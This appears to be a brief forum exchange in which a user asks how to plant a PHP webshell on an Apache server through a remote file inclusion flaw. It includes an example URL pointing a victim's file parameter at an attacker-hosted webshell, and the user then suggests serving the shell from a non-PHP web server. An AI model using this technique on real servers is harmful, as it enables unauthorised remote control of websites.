[Webshells from remote file inclusion]

indeed. I am thinking of hosting my webshell on a simple http server without php so that it will be downloaded as it is. Thank you for your reply.

[Webshells from remote file inclusion]

Hello guys,

Anyone can tell me how to download a webshell.php file on an apache server through a remote file inclusion vulnerability without executing the php file ? I can initiate a remote file inclusion coming like this http://victim_machine/file.php?src=http://attack_machine/webshell.php  but the server apache execute the webshell.php file before dowloading it.  So when I try to read it on the victim machine there is nothing inside... Thank you